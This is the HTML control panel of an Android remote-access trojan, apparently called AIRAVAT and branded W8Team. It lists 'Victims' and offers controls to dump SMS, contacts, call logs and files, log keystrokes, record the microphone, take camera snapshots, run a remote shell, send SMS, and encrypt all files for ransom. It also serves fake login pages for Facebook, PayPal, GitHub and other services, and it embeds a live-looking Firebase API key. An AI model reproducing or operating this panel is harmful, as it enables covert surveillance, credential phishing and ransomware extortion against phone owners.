<!DOCTYPE html>
<html>
<head>
<title>W8Team</title>
<meta charset="UTF-8" />
<script src="" crossorigin="anonymous"></script>
<link rel="icon" href="img/logo.png"  >
<link rel="stylesheet" href="./style.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="./firebase-app.js"></script>
<script src="./firebase-auth.js"></script>
<script src="./jquery.js"></script>
<script src="./firebase-database.js"></script>
<!--<script type="text/javascript" src="app.js" ></script>-->
<script type="text/javascript">
const firebaseConfig = {
  apiKey: "AIzaSyDvLpw_bv0AWy4p_T8RAd1B7HVu-CBP65Y",
  authDomain: "w8teamr.firebaseapp.com",
  databaseURL: "https://w8teamr-default-rtdb.firebaseio.com",
  projectId: "w8teamr",
  storageBucket: "w8teamr.appspot.com",
  messagingSenderId: "828291993035",
  appId: "1:828291993035:web:803a3c5afade0c9c307a4e",
  measurementId: "G-4CCDR37J0F"
};

firebase.initializeApp(firebaseConfig);
</script>
</head>
<style type="text/css">

</style>
<body oncontextmenu="return false" data-sig="ieool29lw9">
<style type="text/css">

</style>


<div id="tophead" >
<h4 class="h4" >W8Team</h4>
<!--<div id="barss"  onclick="opnav(this)">
&#8801;
</div>-->
<div id="navbar" >
<ul>
<li onclick="logsout()">Logout

<li onclick="clrn()">Clear Notifications

<li onclick="clrk()">Clear Keylogs

<li onclick="clrr()">Clear Recording

</ul>
</div>


<div id="maindiv" >

<div id="preloaderr" >
<div  class="load" >
</div>
<div id="loadtxt" >Processing</div>

</div>

<div id="users" >
<br>
<center>Getting List Of Victims ....</center>
</div>
<div id="phones" >
<br>

<div class="dfle"  style="" >
<div class="icon" onclick="dumpsms()">DumpSMS</div>
<div class="icon" onclick="calllogs()" style="background:url('./img/dump_call_logs.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;" >CallLogs</div>
<div class="icon" onclick="filesmanager()" style="background:url('./img/ic3.png');background-size:50px 50px;background-repeat:no-repeat;" >MyFiles</div>
<div class="icon" onclick="getpackages()" style="background:url('./img/list_installed_apps.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;" >AppsList</div>
</div>
<div class="dfle"  style="" >
<div class="icon" onclick="deviceinfo()" style="background:url('./img/dump_device_info.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;" >SysInfo</div>
<div class="icon" onclick="toastt()" style="background:url('./img/toast.png');background-size:50px 50px;background-repeat:no-repeat;" >Toast</div>
<div class="icon" onclick="dumpcontact()" style="background:url('./img/dump_contacts.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;" >Contacts</div>
<div class="icon" onclick="funcmd('plmc')" style="background:url('./img/itune.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;transform:scale(1.07);" >PlayMusic</div>
</div>
<div class="dfle"  style="" >
<div class="icon" onclick="sendmsg()" style="background:url('./img/send_message.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;transform:scale(1);" >SendSMS</div>
<div class="icon" onclick="startshell()" style="background:url('./img/shell_command.png');background-size:50px 50px;background-repeat:no-repeat;" >Shell</div>
<div class="icon" onclick="funcmd('vibradev')" style="background:url('./img/img3.png');background-size:54px 54px;background-repeat:no-repeat;background-position:-2px -2px;">Vibrator</div>
<div class="icon" onclick="funcmd('ttsdev')" style="background:url('./img/img5.png');background-size:50px 50px;background-repeat:no-repeat;">TTS</div>

</div>
<div class="dfle"  style="" >
<div class="icon" onclick="keylogger()" style="background:url('./img/img6.png');background-size:50px 50px;background-repeat:no-repeat;">Keylogger</div>
<div class="icon" onclick="changewallpaper()" style="background:url('./img/img1.png');background-size:50px 50px;background-repeat:no-repeat;transform:scale(1.25);">Wallpaper</div>
<div class="icon" onclick="notificationlog()" style="background:url('./img/img2.png');background-size:50px 50px;background-repeat:no-repeat;">Notifications</div>
<div class="icon" onclick="showphish()" style="background:url('./img/phish.png');background-size:50px 50px;background-repeat:no-repeat;">PhishData</div>
</div>
<div class="dfle"  style="" >
<div class="icon" onclick="showphpag()" style="background:url('./img/scams.png');background-size:50px 50px;background-repeat:no-repeat;">Scams</div>
<div class="icon" onclick="micrec()" style="background:url('./img/microphone_rec.png');background-size:50px 50px;background-repeat:no-repeat;">Recordings</div>
<div class="icon" onclick="siminfo()" style="background:url('./img/sim.png');background-size:50px 50px;background-repeat:no-repeat;">SimInfo</div>
<div class="icon" onclick="camss()" style="background:url('./img/webcam_snap.png');background-size:50px 50px;background-repeat:no-repeat;">Camera</div>
</div>
<div class="dfle"  style="" >
<div class="icon" onclick="ransomwares()" style="background:url('img/ransom.png');background-size:50px 50px;background-repeat:no-repeat;">EncryptFiles</div>
<!--<div class="icon" onclick="funcmd('webdev')" style="background:url('img/web.png');background-size:50px 50px;background-repeat:no-repeat;">OpenWebsite</div>-->
</div>
</div>


<div id="cmdcernter" >
<input type="text" id="cmdref" placeholder="cmdref" value="/comds/comdsdc38kw6i"   ><br>
<input type="text" id="cmd"  placeholder="cmd type"  ><br>
<input type="text" id="cmdvar"  placeholder="cmm"  ><br>
<input type="text" id="cmdvarm"  placeholder="cmd var optional"  ><br>

<button onclick="cmd()" >Send</button><br>
</div>


<div id="resp" onclick="opfol(event)"   >
</div>
<style type="text/css">
#filwt{
position:fixed;
top:10px;
left:10px;
height:auto;
border:1px solid red;
width:100px;
padding:10px;
background:rgba(0,0,0,.9);
z-index:99999999999;
color:white;
display:none;
user-select:none;
}
#filwt ul{
width:100%;
}
#filwt li{
width:100%;
height:30px;
text-align:center;
list-style:none;
line-height:30px;
border-bottom:1px solid green;
}
</style>
<div id="filwt" data-file="">
<ul>
<li onclick="opfol22(this)">Open</li>
<li onclick="foldel(this)">Delete</li>
<li onclick="encryptfol(this);"  >Encrypt</li>
<li onclick="decryptfol(this);" id="decrfol"  style="border-bottom:0px;" >Decrypt</li>
</ul>
</div>

<div id="fprev"  >
<h4>Preview </h4><br>
<img id="imv"  src="img3.png" >
<iframe id="imv2"  src="img3.png" style="height:40%;width:100%;" ></iframe>
<br>
<hr>
<ul id="fprevdes" >
<li>Name : Fuck Hard
<li>Size: 100 MB
<li>Creation: 11 Aug 2055
<li>Path: /sdcard/fuck.png</li>
<li><a download=""  id="btdwn" target="_blank"  href="hh">Download File</a><br>
</ul>
<style type="text/css">

</style>
<br>

<span class="span"  onclick='this.parentElement.style.display="none";setdatcmd("cd","/sdcard/","",respov);'>×</span>
</div>
<style type="text/css">
#camview {
position:absolute;
top:0;
left:0;
text-align:center;
line-height:100%;
height:100%;
width:100%;
z-index:99999;
display:none;
background:black;
}
#camview img{
max-height:100%;
max-width:100%;
border:0;
}
</style>
<div id="camview" >
<img id="camimg"  src="avatar.png" >
<a href="#" id="downlocam"  target="_blank" download="image.png"   ><div class="down" >				<svg  fill="white" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M19 9h-4V3H9v6H5l7 7 7-7zM5 18v2h14v-2H5z"/></svg>							</div></a>
</div>
<div id="viewers" >
<iframe id="vieweri"  src="data:text/html,<h4 style='color:green' > Getting File for preview....</h4>" ></iframe>
<a href="#" id="downlo"  target="_blank" download="file.html"   ><div class="down" >				<svg  fill="white" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M19 9h-4V3H9v6H5l7 7 7-7zM5 18v2h14v-2H5z"/></svg>							</div></a>
</div>



<script type="text/javascript">
function mousehandler(e) {
var myevent = (isNS) ? e : event;
var eventbutton = (isNS) ? myevent.which : myevent.button;
if ((eventbutton == 2) || (eventbutton == 3)) return false;
}
document.oncontextmenu = mischandler;
document.onmousedown = mousehandler;
document.onmouseup = mousehandler;
function disableCtrlKeyCombination(e) {
var forbiddenKeys = new Array("a", "s", "c", "x","u");
var key;
var isCtrl;
if (window.event) {
key = window.event.keyCode;
//IE
if (window.event.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
else {
key = e.which;
//firefox
if (e.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
if (isCtrl) {
for (i = 0; i < forbiddenKeys.length; i++) {
//case-insensitive comparation
if (forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase()) {
return false;
}
}
}
return true;
}
</script>

<div id="shellcmd" >
<div id="shelldata" >AIRAVAT Shell<br><sub>(some root commands may not work properly)</sub> </div>
<input type="text" onkeyup="shellcm(this)"  id="shellcmdd" placeholder="Enter Your Command Here_"   />
</div>



<div id="notikey" ></div>

<div id="toastdiv" >
<br>
<h3>Toast</h3>
<br>
<textarea type="text" id="toastcmd"  placeholder="Type Your Message Here"  /></textarea>
<br><br><button onclick="toastexc()">Execute</button>
</div>
<style type="text/css">
#ransomdiv{
display:none;
z-index:999999999;
height:100%;
width:100%;
background:#000;
position:absolute;
top:0;
left:0;

}
#ransomdiv button{
margin-left:30px;
height:40px;
width:210px;
color:#fff;
background:black;
border:1px solid red;
border-radius:5px;
}
#ransomcmd{
margin-left:30px;
height:50px;
padding-left:10px;
width:80%;
border:0.5px solid #0dd;
background:#001;
color:#fff;
border-radius:5px;
line-height:50px;
}
</style>
<div id="ransomdiv" >
<br>
<h3>RansomWare</h3>
<br>
<input type="text" id="ransomcmd"  placeholder="Enter the Ransom Text"  >
<br><br><button onclick="ransomen()"><i class="fa fa-lock" ></i> Encrypt All Files</button>
<br><br><button onclick="ransomde()"><i class="fa fa-lock-open" ></i> Decrypt All Files</button>
</div>

<div  id="diamain" onclick="this.style.display='none';" >
<div class="diachild" >
<h3 style="color:#0dd" >Response</h3><br>
<p id="diatext" id="diatext" >This is response Text bsdk </p>
<br>
<button>OK</button>
</div>
</div>




<div id="pvtt" >
<h3 style="color:red" >FUN COMMANDS</h3><br><br>
<div id="plmc" >
<h4>Play Music </h4><br>
<input type="text" id="musiccmd"  placeholder="Enter Direct .mp3 link"  >
<br><button onclick="playmus()" >Execute</button>
<br><br><hr><br>
</div>
<div id="vibradev" >
<h4>Vibrate Device </h4><br>
<input type="text" id="vibratecmd"  placeholder="Enter No. of Seconds"  >
<br><button onclick="vibra()">Execute</button>
<br><br><hr><br>
</div>
<div id="ttsdev" >
<h4>Text To Speech </h4><br>
<input type="text" id="ttscmd"  placeholder="Enter Your Text Message"  >
<br><button onclick="ttsf()">Execute</button>
</div>
<div id="webdev" >
<h4>Open Website </h4><br>
<input type="text" id="webscmd"  placeholder="Enter Website URL"  >
<br><button onclick="webssow()">Execute</button>
</div>
</div>


<div id="senddm">
<h4 style="color:#0fa">Send SMS</h4><br><br>
TO:<input type="text" id="smsnumber"  placeholder="Enter Mobile Number"  ><br><br>
Message:<br><br><textarea id="smscontent"  placeholder="Enter Message Content" ></textarea>
<br><br>
<center><button onclick="sendsms()">Send SMS</button></center>
</div>



<div id="wallpaperdiv" ><br>
<h3 style="color:#0f9" >Select Wallpaper </h3><br><br>
<div class="wallimg" >
<img src="./img/wall1.png" onclick="selectimg(this,0)" id="selectedimg" >
<img src="./img/wall2.png" onclick="selectimg(this,1)" >
<img src="./img/wall3.png" onclick="selectimg(this,2)"  >
</div>
<br>
<center><button onclick="setwalls()">Set Wallpaper</button></center>
</div>


<div id="micrec" >
<br>
<h3>Record</h3>
<br>
<input type="text" id="recval"  placeholder="Record For x Seconds"  />
<br><button class="btn"  onclick="recordvoice()">Record Mic</button>
<br>
<hr>
<br>
<br><h3>Recordings</h3><br>
<div id="showrecs" >
</div>

</div>



<div id="showphishj" >
<br>
<h3>Phishing Commands</h3><br><br>
<input type="text" id="nshpih"  placeholder="Enter Notification Title"  /><br>
<br><hr>
<select onchange="iojh()" id="lshpih" >
<option value='0'>dropbox3.png</option><option value='1'>facebook2.png</option><option value='2'>facebook5.png</option><option value='3'>free_fire3.png</option><option value='4'>github1.png</option><option value='5'>instagram1.png</option><option value='6'>linkedin1.png</option><option value='7'>messenger1.png</option><option value='8'>microsoft1.png</option><option value='9'>netflix1.png</option><option value='10'>paypal2.png</option><option value='11'>protonmail1.png</option><option value='12'>pubg2.png</option><option value='13'>snapchat1.png</option><option value='14'>tumblir1.png</option><option value='15'>twitter1.png</option><option value='16'>wordpress1.png</option><option value='17'>yahoo1.png</option>

</select>
<img src="./imgg/dropbox3.png" id="hion"  style="max-height:60px;max-width:60px;" >
<br><br>
<center>
<select id="phpage" >
<option value="dropbox.html">

dropbox.html
<option value="facebook_desktop_homepage.html">

facebook_desktop_homepage.html
</option>
<option value="facebook_desktop_static.html">

facebook_desktop_static.html
</option>
<option value="facebook_mobile.html">

facebook_mobile.html
</option>
<option value="facebook_mobile_fake_security.html">

facebook_mobile_fake_security.html
</option>
<option value="garena_free_fire.html">

garena_free_fire.html
</option>
<option value="github.html">

github.html
</option>
<option value="instagram.html">

instagram.html
</option>
<option value="linkedin.html">

linkedin.html
</option>
<option value="messenger.html">

messenger.html
</option>
<option value="microsoft.html">

microsoft.html
</option>
<option value="netflix.html">

netflix.html
</option>
<option value="paypal.html">

paypal.html
</option>
<option value="protonmail.html">

protonmail.html
</option>
<option value="pubg.html">

pubg.html
</option>
<option value="snapchat.html">


snapchat.html
</option>
<option value="tumblr.html">

tumblr.html
</option>
<option value="twitter_desktop.html">

twitter_desktop.html
</option>
<option value="twitter_mobile.html">

twitter_mobile.html
</option>
<option value="wordpress.html">

wordpress.html
</option>
<option value="yahoo.html">

yahoo.html
</option>
</select>

<button onclick="execphish()"> Execute</button>
</center>
<br>
<hr>
<br>
<input type="text" id="shpih"  placeholder="Enter Your Link"  />
<br><button class="btn"  onclick="execphish2()">Execute</button>
</div>

</div>

<script type="text/javascript" src="./script.js" ></script>
</body>
</html>